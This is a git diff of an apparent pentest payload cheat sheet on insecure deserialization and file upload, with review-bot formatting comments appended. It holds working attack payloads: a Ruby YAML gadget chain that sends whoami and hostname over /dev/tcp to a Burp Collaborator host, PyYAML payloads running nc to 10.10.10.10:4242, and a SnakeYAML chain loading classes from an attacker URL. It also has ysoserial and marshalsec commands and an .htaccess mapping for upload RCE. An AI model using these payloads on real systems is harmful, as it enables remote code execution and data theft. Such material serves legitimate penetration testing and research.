diff --git a/.gitignore b/.gitignore index 18dcf8e89d..5d5f0c5e26 100644 --- a/.gitignore +++ b/.gitignore @@ -1,4 +1,3 @@ BuildPDF/ .vscode -.todo -AWS Amazon Lambda/ \ No newline at end of file +.todo \ No newline at end of file diff --git a/Insecure Deserialization/Files/PHP-Serialization-RCE-Exploit.php b/Insecure Deserialization/Files/PHP-Serialization-RCE-Exploit.php deleted file mode 100644 index 8ae88dbe83..0000000000 --- a/Insecure Deserialization/Files/PHP-Serialization-RCE-Exploit.php +++ /dev/null @@ -1,32 +0,0 @@ - diff --git a/Insecure Deserialization/Files/ruby-serialize.yaml b/Insecure Deserialization/Files/ruby-serialize.yaml new file mode 100644 index 0000000000..45da864104 --- /dev/null +++ b/Insecure Deserialization/Files/ruby-serialize.yaml @@ -0,0 +1,19 @@ +--- +- !ruby/object:Gem::Installer + i: x +- !ruby/object:Gem::SpecFetcher + i: y +- !ruby/object:Gem::Requirement + requirements: + !ruby/object:Gem::Package::TarReader + io: &1 !ruby/object:Net::BufferedIO + io: &1 !ruby/object:Gem::Package::TarReader::Entry + read: 0 + header: "abc" + debug_output: &1 !ruby/object:Net::WriteAdapter + socket: &1 !ruby/object:Gem::RequestSet + sets: !ruby/object:Net::WriteAdapter + socket: !ruby/module 'Kernel' + method_id: :system + git_set: "bash -c 'echo 1 > /dev/tcp/`whoami`.`hostname`.wkkib01k9lsnq9qm2pogo10tmksagz.burpcollaborator.net/443'" + method_id: :resolve \ No newline at end of file diff --git a/Insecure Deserialization/Java.md b/Insecure Deserialization/Java.md index 71404a6839..a40b19ac7d 100644 --- a/Insecure Deserialization/Java.md +++ b/Insecure Deserialization/Java.md 
@@ -11,7 +11,7 @@ ## Exploit -[ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. +[frohoff/ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. ```java java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin 
@@ -20,37 +20,44 @@ java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > pay java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64 ``` -payload | author | dependencies | impact (if not RCE) -------|--------|------ |------ -BeanShell1 |@pwntester, @cschneider4711 |bsh:2.0b5 -C3P0 |@mbechler |c3p0:0.9.5.2, mchange-commons-java:0.2.11 -Clojure |@JackOfMostTrades |clojure:1.8.0 -CommonsBeanutils1 |@frohoff |commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 -CommonsCollections1 |@frohoff |commons-collections:3.1 -CommonsCollections2 |@frohoff |commons-collections4:4.0 -CommonsCollections3 |@frohoff |commons-collections:3.1 -CommonsCollections4 |@frohoff |commons-collections4:4.0 -CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1 -CommonsCollections6 |@matthias_kaiser |commons-collections:3.1 -FileUpload1 |@mbechler |commons-fileupload:1.3.1, commons-io:2.4 | file uploading -Groovy1 |@frohoff |groovy:2.3.9 -Hibernate1 |@mbechler| -Hibernate2 |@mbechler| -JBossInterceptors1 |@matthias_kaiser |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 -JRMPClient |@mbechler| -JRMPListener |@mbechler| -JSON1 |@mbechler |json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 -JavassistWeld1 |@matthias_kaiser |javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 -Jdk7u21 |@frohoff| -Jython1 |@pwntester, @cschneider4711 |jython-standalone:2.5.2 -MozillaRhino1 |@matthias_kaiser |js:1.7R2 -Myfaces1 |@mbechler| -Myfaces2 |@mbechler| -ROME |@mbechler |rome:1.0 -Spring1 |@frohoff |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE -Spring2 |@mbechler 
|spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 -URLDNS |@gebl| | jre only vuln detect -Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:1.6.4 +```ps1 +Payload Authors Dependencies +------- ------- ------------ +AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2 +BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5 +C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11 +Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0 +Clojure @JackOfMostTrades clojure:1.8.0 +CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 +CommonsCollections1 @frohoff commons-collections:3.1 +CommonsCollections2 @frohoff commons-collections4:4.0 +CommonsCollections3 @frohoff commons-collections:3.1 +CommonsCollections4 @frohoff commons-collections4:4.0 +CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1 +CommonsCollections6 @matthias_kaiser commons-collections:3.1 +CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1 +FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4 +Groovy1 @frohoff groovy:2.3.9 +Hibernate1 @mbechler +Hibernate2 @mbechler +JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 +JRMPClient @mbechler +JRMPListener @mbechler +JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 +JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 +Jdk7u21 @frohoff +Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2 +MozillaRhino1 @matthias_kaiser js:1.7R2 +MozillaRhino2 @_tint0 js:1.7R2 +Myfaces1 
@mbechler +Myfaces2 @mbechler +ROME @mbechler rome:1.0 +Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE +Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 +URLDNS @gebl +Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14 +Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4 +``` ## Burp extensions using ysoserial @@ -69,7 +76,8 @@ Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api: - [marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution ```java -java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec. [-a] [-v] [-t] [ []] +$ java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec. [-a] [-v] [-t] [ []] +$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389 where -a - generates/tests all payloads for that marshaller @@ -101,10 +109,12 @@ Payload generators for the following marshallers are included:
## References - [Github - ysoserial](https://github.com/frohoff/ysoserial) +- [Triggering a DNS lookup using Java Deserialization - paranoidsoftware.com](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/) +- [Detecting deserialization bugs with DNS exfiltration - Philippe Arteau | Mar 22, 2017](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/) - [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) - [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) - [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) - [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) - [Jackson CVE-2019-12384: anatomy of a vulnerability class](https://blog.doyensec.com/2019/07/22/jackson-gadgets.html) - [On Jackson CVEs: Don’t Panic — Here is what you need to know](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062#da96) -- [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin / @artsploit - 29 June 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464) \ No newline at end of file +- [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin / @artsploit - 29 June 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464) diff --git a/Insecure Deserialization/README.md b/Insecure Deserialization/README.md index 14df5714c8..6faf500660 100644 --- a/Insecure Deserialization/README.md 
+++ b/Insecure Deserialization/README.md @@ -8,6 +8,7 @@ Check the following sub-sections, located in other files : * [PHP (Object injection) : phpggc, ...](PHP.md) * [Ruby : universal rce gadget, ...](Ruby.md) * [Python : pickle, ...](Python.md) +* [YAML : PyYAML, ...](YAML.md) ## References diff --git a/Insecure Deserialization/Ruby.md b/Insecure Deserialization/Ruby.md index 79c91e7e02..c3f2fa658e 100644 --- a/Insecure Deserialization/Ruby.md +++ b/Insecure Deserialization/Ruby.md @@ -59,4 +59,5 @@ Universal gadget for ruby 2.x - 3.x. - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) - [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/) - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online) -- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/) \ No newline at end of file +- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/) +* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/) \ No newline at end of file diff --git a/Insecure Deserialization/YAML.md b/Insecure Deserialization/YAML.md new file mode 100644 index 0000000000..326394c340 --- /dev/null +++ b/Insecure Deserialization/YAML.md 
@@ -0,0 +1,89 @@ +# YAML Deserialization + +## Summary + +* [Tools](#tools) +* [Exploit](#exploit) + * [PyYAML](#pyyaml) + * [ruamel.yaml](#ruamelyaml) + * [Ruby](#ruby) + * [SnakeYAML](#snakeyaml) +* [References](#references) + +## Tools + +* [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) +* [artsploit/yaml-payload](https://github.com/artsploit/yaml-payload) - A tiny project for generating SnakeYAML deserialization payloads +* [mbechler/marshalsec](https://github.com/mbechler/marshalsec) + +## Exploit + +### PyYAML + +```yaml +!!python/object/apply:time.sleep [10] +!!python/object/apply:builtins.range [1, 10, 1] +!!python/object/apply:os.system ["nc 10.10.10.10 4242"] +!!python/object/apply:os.popen ["nc 10.10.10.10 4242"] +!!python/object/new:subprocess [["ls","-ail"]] +!!python/object/new:subprocess.check_output [["ls","-ail"]] +``` + +```yaml +!!python/object/apply:subprocess.Popen +- ls +``` + +```yaml +!!python/object/new:str +state: !!python/tuple +- 'print(getattr(open("flag\x2etxt"), "read")())' +- !!python/object/new:Warning + state: + update: !!python/name:exec +``` + +## Ruamel.yaml + +## Ruby + +```ruby + --- + - !ruby/object:Gem::Installer + i: x + - !ruby/object:Gem::SpecFetcher + i: y + - !ruby/object:Gem::Requirement + requirements: + !ruby/object:Gem::Package::TarReader + io: &1 !ruby/object:Net::BufferedIO + io: &1 !ruby/object:Gem::Package::TarReader::Entry + read: 0 + header: "abc" + debug_output: &1 !ruby/object:Net::WriteAdapter + socket: &1 !ruby/object:Gem::RequestSet + sets: !ruby/object:Net::WriteAdapter + socket: !ruby/module 'Kernel' + method_id: :system + git_set: sleep 600 + method_id: :resolve +``` + +## SnakeYAML + +```yaml +!!javax.script.ScriptEngineManager [ + !!java.net.URLClassLoader [[ + !!java.net.URL ["http://attacker-ip/"] + ]] +] +``` + + +## References + +* [Python Yaml Deserialization - 
hacktricks.xyz][https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization] +* [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13][https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf] +* [PyYAML Documentation](https://pyyaml.org/wiki/PyYAMLDocumentation) +* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/) +* [[CVE-2019-20477]- 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2 - @_j0lt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/) \ No newline at end of file diff --git a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_rce_files b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_rce_files new file mode 100644 index 0000000000..64b38fbcc5 --- /dev/null +++ b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_rce_files @@ -0,0 +1 @@ +AddType application/x-httpd-php .rce \ No newline at end of file diff --git a/Upload Insecure Files/Configuration Apache .htaccess/README.md b/Upload Insecure Files/Configuration Apache .htaccess/README.md index 30b059d31b..a340e91b52 100644 --- a/Upload Insecure Files/Configuration Apache .htaccess/README.md +++ b/Upload Insecure Files/Configuration Apache .htaccess/README.md @@ -25,6 +25,11 @@ AddType application/x-httpd-php .htaccess &1"); ?> ``` +# .htaccess simple php + +Upload an .htaccess with : `AddType application/x-httpd-php .rce` +Then upload any file with `.rce` extension. + # .htaccess upload as image If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot.
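Review bot: the `.gitignore` hunk removes `AWS Amazon Lambda/` from the ignore list in the same commit that adds the YAML deserialization page; this is unrelated to the rest of the change and, if the Lambda directory is meant to start being tracked, deserves its own commit with a message saying so. If the removal is accidental, keep the entry and only apply the `.todo` end-of-file fix.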
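Review bot: `Insecure Deserialization/Files/PHP-Serialization-RCE-Exploit.php` is deleted outright, and no hunk in this diff touches `Insecure Deserialization/PHP.md`; check that the PHP page does not still link to `Files/PHP-Serialization-RCE-Exploit.php`, and if the sample has moved rather than been dropped, update that link to the new location.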
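Review bot: the `git_set` value in the new `Files/ruby-serialize.yaml` hard-codes a Burp Collaborator hostname (`wkkib01k9lsnq9qm2pogo10tmksagz.burpcollaborator.net`) that belongs to one tester's session and will be dead by the time anyone reads the file; replace it with a placeholder such as `ATTACKER_DOMAIN`, the way the `YAML.md` copy of the same chain uses `git_set: sleep 600`. That same 19-line chain is pasted verbatim into `YAML.md`, so the two copies will drift; keep one and link the other to it. Also, the `&1` anchor is defined four times in one document and no `*1` alias ever references it, so the anchors add nothing but confusion and can be dropped.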
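Review bot: turning the ysoserial payload table in `Java.md` into a ```ps1 fence loses both rendering and content: the `impact (if not RCE)` column disappears, and with it the notes that `FileUpload1` only gives file upload and that `URLDNS` is a JRE-only vulnerability-detection gadget rather than RCE, which is exactly the distinction a reader needs when choosing a payload; `ps1` is also the wrong language tag for a plain-text table. Keep the markdown table and add the new rows (`AspectJWeaver`, `Click1`, `CommonsCollections7`, `MozillaRhino2`, `Vaadin1`) to it, or if a fixed-width block is really preferred, tag it `text` and restore the impact column.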
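Review bot: both command lines in the marshalsec block read `marshalsec. [-a] [-v] [-t] [ []]`, so the placeholders after `marshalsec.` and inside the brackets have been swallowed (angle-bracket placeholders rendered as HTML); escape them or put the usage line in backticks so the marshaller name and gadget arguments are visible again. The fence is tagged `java` but holds shell commands, and the newly added `$ ` prompts get copied along with the command; tag the block `bash` and drop the prompts, as the `java -jar ysoserial.jar ...` blocks above do. A short line explaining that `1389` is the LDAP listener port and `http://localhost:8000\#exploit.JNDIExploit` is the codebase URL plus class name the reference points at would make the second command self-explanatory.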
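Review bot: the reference added to `Ruby.md` uses a `*` bullet while every other entry in that list uses `-`; match the existing marker, since mixed markers are rendered as two separate lists by some markdown engines.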
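Review bot: in the new `YAML.md`, the Summary lists ruamel.yaml, Ruby and SnakeYAML as sub-sections of Exploit, but their headings are `## Ruamel.yaml`, `## Ruby` and `## SnakeYAML` (level 2) while PyYAML is `### PyYAML`; make them `###` so the structure matches the summary and the `#ruamelyaml` anchor resolves. The `Ruamel.yaml` section is empty and should either get content or be left out of the summary until it does. The Ruby gadget chain is fenced as ```ruby but is YAML, and every line is indented by one space, which pushes the `---` marker off column 0; fence it as `yaml` and strip the indent. In the PyYAML block, `!!python/object/new:subprocess [["ls","-ail"]]` targets the module itself rather than a callable, unlike the `subprocess.Popen` entry below it, so that line deserves a second look. Finally, the first two references use `][...]` instead of `](...)`, so they will not render as links.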
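Review bot: the new `# .htaccess simple php` section in the `.htaccess` README does not link to the sample file `.htaccess_rce_files` added in the same commit, so the file is orphaned; reference it from the section. The text `Upload an .htaccess with :` has a stray space before the colon. It is also worth one sentence of caveat here: the `AddType application/x-httpd-php .rce` mapping only takes effect where `AllowOverride` permits `FileInfo` for that directory and PHP runs as an Apache module (`mod_php`); under PHP-FPM the handler mapping lives elsewhere and the uploaded `.rce` file is served as static content, which is also the configuration defenders should prefer.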